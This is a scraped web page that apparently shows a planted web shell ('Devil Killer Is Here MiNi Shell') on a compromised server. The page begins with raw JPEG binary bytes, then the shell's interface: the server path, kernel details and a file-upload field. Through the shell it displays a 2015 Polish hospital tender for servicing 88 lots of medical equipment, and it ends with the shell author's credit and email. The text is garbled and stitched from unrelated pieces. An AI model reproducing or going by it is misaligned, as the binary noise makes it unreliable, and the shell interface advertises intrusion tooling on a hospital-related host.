JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150414/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150414/51999-N-2015.html

<p class="kh_header"><b>Zgierz: Świadczenie usług przeglądów technicznych, napraw/diagnostyki aparatury medycznej dla Wojewódzkiego Szpitala  Specjalistycznego im. Marii Skłodowskiej- Curie  w  Zgierzu,  ul. Parzęczewska 35 z podziałem na 88 części</b><br>
<b>Numer ogłoszenia: 51999 - 2015; data zamieszczenia: 14.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Specjalistyczny im. Marii Skłodowskiej-Curie w Zgierzu , ul. Parzęczewska 35, 95-100 Zgierz, woj. łódzkie, tel. 42 7144332, 7144505, faks 42 7144530.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.zgierz.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług przeglądów technicznych, napraw/diagnostyki aparatury medycznej dla Wojewódzkiego Szpitala  Specjalistycznego im. Marii Skłodowskiej- Curie  w  Zgierzu,  ul. Parzęczewska 35 z podziałem na 88 części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Świadczenie usług przeglądów technicznych, napraw/diagnostyki aparatury medycznej dla Wojewódzkiego Szpitala  Specjalistycznego im. Marii Skłodowskiej- Curie  w  Zgierzu,  ul. Parzęczewska 35 z podziałem na 88 części
Przedmiot zamówienia jest określony we Wspólnym Słowniku Zamówień kodem CPV:   
50.42.10.00-2. Kategoria usługi: nr 1.
 Przedmiot zamówienia obejmuje swoim zakresem:
Część  1: Przeglądy, naprawy/diagnostyka kamery PAL firmy Aesculap Chifa Sp. z o.o.
Część  2: Przeglądy, naprawy/diagnostyka Aparatu do resustytacji
Część  3: Przeglądy, naprawy/diagnostyka gastroduodenoskopu
Część  4: Przeglądy, naprawy/diagnostyka lampy czołowej
Część  5: Przeglądy, naprawy/diagnostyka procesora histologicznego
Część  6: Przeglądy, naprawy/diagnostyka systemu manometr.
Część  7: Przeglądy, naprawy/diagnostyka aparatu RTG
Część  8: Przeglądy, naprawy/diagnostyka aparatu RTG 
Część  9: Przeglądy, naprawy/diagnostyka rejestratorów EKG 
Część  10: Przeglądy, naprawy/diagnostyka mikroskopów 
Część  11: Przeglądy, naprawy/diagnostyka mikroskopów
Część  12: Przeglądy, naprawy/diagnostyka myjni
Część  13: Przeglądy, naprawy/diagnostyka noża harmonicznego
Część  14: Przeglądy, naprawy/diagnostyka Oftalmometru 
Część  15: Przeglądy, naprawy/diagnostyka piły 
Część  16: Przeglądy, naprawy/diagnostyka aparatu Pulsotronic
Część  17: Przeglądy, naprawy/diagnostyka pomp infuzyjnych
Część  18: Przeglądy, naprawy/diagnostyka pomp
Część  19: Przeglądy, naprawy/diagnostyka aparatu Sonicator
Część  20: Przeglądy, naprawy/diagnostyka aparatu SW-500
Część  21: Przeglądy, naprawy/diagnostyka aparatu Terapuls
Część  22: Przeglądy, naprawy/diagnostyka aparatu Ultratom
Część  23: Przeglądy, naprawy/diagnostyka videokolposkopu
Część  24: Przeglądy, naprawy/diagnostyka Kardiomonitora
Część  25: Przeglądy, naprawy/diagnostyka videokolonoskopu
Część  26: Przeglądy, naprawy/diagnostyka wiertarek
Część  27: Przeglądy, naprawy/diagnostyka wirówek
Część  28: Przeglądy, naprawy/diagnostyka zestawu do podciś. terapii ran
Część  29: Przeglądy, naprawy/diagnostyka zestawu do zab. Artroskowych
Część  30: Przeglądy, naprawy/diagnostyka zestawu edoskopo.
Część  31: Przeglądy, naprawy/diagnostyka Źródła światła
Część  32: Przeglądy, naprawy/diagnostyka aparatu do zamyk. Naczyń kwiono.
Część  33: Przeglądy, naprawy/diagnostyka noża ultradźw.
Część  34: Przeglądy, naprawy/diagnostyka autoczytników
Część  35: Przeglądy, naprawy/diagnostyka Cieplarki
Część  36: Przeglądy, naprawy/diagnostyka dermatomu
Część  37: Przeglądy, naprawy/diagnostyka Elektroskopu 
Część  38: Przeglądy, naprawy/diagnostyka kardiotokografu
Część  39: Przeglądy, naprawy/diagnostyka lampy szczelinowej
Część  40: Przeglądy, naprawy/diagnostyka lasera diodowego
Część  41: Przeglądy, naprawy/diagnostyka aparatu Mark III Plus
Część  42: Przeglądy, naprawy/diagnostyka sterylizatora
Część  43: Przeglądy, naprawy/diagnostyka Ap.do bad.ostr. Wzroku 
Część  44: Przeglądy, naprawy/diagnostyka Ap.do biometrii 
Część  45: Przeglądy, naprawy/diagnostyka Ap.do zniecz.ogólnego
Część  46: Przeglądy, naprawy/diagnostyka  aparatu kompresyjno-dystrakcyjnego
Część  47: Przeglądy, naprawy/diagnostyka  autorefraktometru
Część  48: Przeglądy, naprawy/diagnostyka  bronchofiberoskopu
Część  49: Przeglądy, naprawy/diagnostyka  chłodziarki
Część  50: Przeglądy, naprawy/diagnostyka  czytnika płytek 
Część  51: Przeglądy, naprawy/diagnostyka defibrylatorów
Część  52: Przeglądy, naprawy/diagnostyka  Diafanoskopu
Część  53: Przeglądy, naprawy/diagnostyka  Egzoftalmometru
Część  54: Przeglądy, naprawy/diagnostyka Aparatów EKG
Część  55: Przeglądy, naprawy/diagnostyka  Gastrofiberoskopu
Część  56: Przeglądy, naprawy/diagnostyka Glukometrów
Część  57: Przeglądy, naprawy/diagnostyka inkubatorów do mikro metody
Część  58: Przeglądy, naprawy/diagnostyka Pomp Infuzyjnych
Część  59: Przeglądy, naprawy/diagnostyka  lupy 
Część  60: Przeglądy, naprawy/diagnostyka Łóżek inten. Terapii 
Część  61: Przeglądy, naprawy/diagnostyka Łóżek szpitalnych
Część  62: Przeglądy, naprawy/diagnostyka  Magnetronic 
Część  63: Przeglądy, naprawy/diagnostyka Pomp Infuzyjnych
Część  64: Przeglądy, naprawy/diagnostyka Pompy Infuzyjnej
Część  65: Przeglądy, naprawy/diagnostyka mikrotomów 
Część  66: Przeglądy, naprawy/diagnostyka Myjnii endoskopów
Część  67: Przeglądy, naprawy/diagnostyka Oftalmodynamometru 
Część  68: Przeglądy, naprawy/diagnostyka pipet 
Część  69: Przeglądy, naprawy/diagnostyka  Pompy Infuzyjnej
Część  70: Przeglądy, naprawy/diagnostyka rejestratorów ciśnienia
Część  71: Przeglądy, naprawy/diagnostyka aparatu RTG 
Część  72: Przeglądy, naprawy/diagnostyka spirometru 
Część  73: Przeglądy, naprawy/diagnostyka ssaków 
Część  74: Przeglądy, naprawy/diagnostyka Stanow.do pielęg.niemow.
Część  75: Przeglądy, naprawy/diagnostyka sterylizatora
Część  76: Przeglądy, naprawy/diagnostyka  Łóżka rehab
Część  77: Przeglądy, naprawy/diagnostyka Tonometrów
Część  78: Przeglądy, naprawy/diagnostyka Toru wizyjnego
Część  78: Przeglądy, naprawy/diagnostyka Ureteroskopu
 Część  80: Przeglądy, naprawy/diagnostyka aparatu USG
Część  81: Przeglądy, naprawy/diagnostyka aparatu VISUS
Część  82: Przeglądy, naprawy/diagnostyka wiertarki 
Część  83: Przeglądy, naprawy/diagnostyka wirówki 
Część  84: Przeglądy, naprawy/diagnostyka wirówki 
Część  85: Przeglądy, naprawy/diagnostyka wirówki 
Część  86: Przeglądy, naprawy/ diagnostyka Zestawu do ogrzew.pacje
Część  87: Przeglądy, naprawy/diagnostyka Zestawu do ogrzew.pacje 
Część  88: Przeglądy, naprawy/diagnostyka aparatu USG. Zamówienie poniżej 207 000 euro.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 88.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1. Spełniają warunki określone przepisami art. 22 ust. 1 ustawy Prawo zamówień publicznych.
2. Posiadają wiedzę i doświadczenie w zakresie przedmiotu zamówienia tj. wykażą się   
realizacją minimum  dwóch usług przeglądów lub konserwacji lub napraw aparatury medycznej o wartości nie niższej niż:
 - 500,00 zł (pięćset złotych) brutto każda - dotyczy części: 2, 3, 6, 7, 8, 10, 11, 12, 17, 18, 23, 25, 29, 30, 32, 33, 34, 38, 42, 45, 51, 55,  56, 58, 60, 65, 66, 71, 75, 78, 80, 82, 88  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia  działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat  wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączenia dowodów, czy zostały wykonane lub są wykonywane należycie - Załącznik nr 3. ( Na pozostałe części wymagane jest tylko oświadczenie zawarte w Ogólnym Formularzu Oferty).
3.	Potwierdzą brak podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1, tj. przedłożą dokumenty, o których mowa w pkt. 3 ppkt. 3.2. SIWZ. 
Ocena spełnienia w/w warunków odbywać się będzie w oparciu o informacje zawarte 
w dokumentach i oświadczeniach wyszczególnionych w pkt. 3 SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane usługi odpowiadają wymaganiom określonym przez 
          Zamawiającego, Zamawiający żąda załączenia do oferty: 
a.	oświadczenie Wykonawcy, że osoby , które będą uczestniczyć w wykonywaniu zamówienia posiadają świadectwa kwalifikacyjne E na stanowisku eksploatacji w zakresie elektroenergetycznym( dla osób zajmujących się eksploatacją urządzeń, instalacji i sieci elektroenergetycznych i wykonujących prace w zakresie: obsługi, konserwacji, napraw kontrolno- pomiarowym i montażu) do 1 kV oraz oświadczenie Wykonawcy, że posiada aktualne świadectwa wzorcowania i kalibracji przyrządów pomiarowych, używanych przy wykonywaniu usług</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Czas przystąpienia do realizacji usługi w zakresie napraw/diagnostyki aparatury - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający dopuszcza możliwość zmiany terminu obowiązywania umowy i przedłużenia okresu jej realizacji o maksymalny okres 3 miesięcy, w przypadku niewyczerpania kwoty zobowiązania wynikającego z umowy. W takim przypadku ogólna wartość umowy nie może ulec zmianie, chyba że niniejsza umowa stanowi inaczej. 2. Wszelkie zmiany niniejszej umowy mogą być dokonywane za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności. Zmiana cen będąca skutkiem zmiany stawki podatku VAT nie wymaga zmiany umowy w formie aneksu. 3. Zmiany umowy mogą nastąpić w przypadku: a) obniżenia ceny lub innych zmian korzystnych dla Zamawiającego. b) w przypadku, gdy zmiany dotyczą nieistotnych postanowień umowy, tj. zmian, o których wiedza na etapie postępowania o udzielenie zamówienia nie miałaby wpływu na krąg podmiotów ubiegających się o udzielenie zamówienia czy też wynik postępowania przetargowego. c) w razie zmiany terminu obowiązywania umowy, zgodnie z § 5 ust. 3. d) określonych w § 3 ust. 9. 3. Zmiany umowy, o których mowa pkt. a, b, c, d dokonywane są w drodze aneksu do umowy. 4. Warunkiem dokonania zmiany umowy jest wystąpienie przez stronę zainteresowaną wprowadzeniem zmian do umowy z pisemnym wnioskiem zawierającym proponowane zmiany wraz z uzasadnieniem faktycznym i prawnym. Do wniosku powinien być dołączony projekt aneksu do umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.zgierz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w Wojewódzkim Szpitalu Specjalistycznym im. Marii Skłodowskiej-Curie w Zgierzu, ul. Parzęczewska 35 - Sekcja Zamówień Publicznych (budynek administracji, pok. 2).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.04.2015 godzina 11:45, miejsce: w Wojewódzkim Szpitalu Specjalistycznym im. Marii Skłodowskiej-Curie w Zgierzu, ul. Parzęczewska 35 - Sekcja Zamówień Publicznych (budynek administracji, pok. 2).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamawiający nie dopuszcza możliwości złożenia oferty wariantowej. 2. Zamawiający nie przewiduje zawarcia umowy ramowej, ustanowienia dynamicznego systemu zakupów oraz zastosowania aukcji elektronicznej. 3. Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com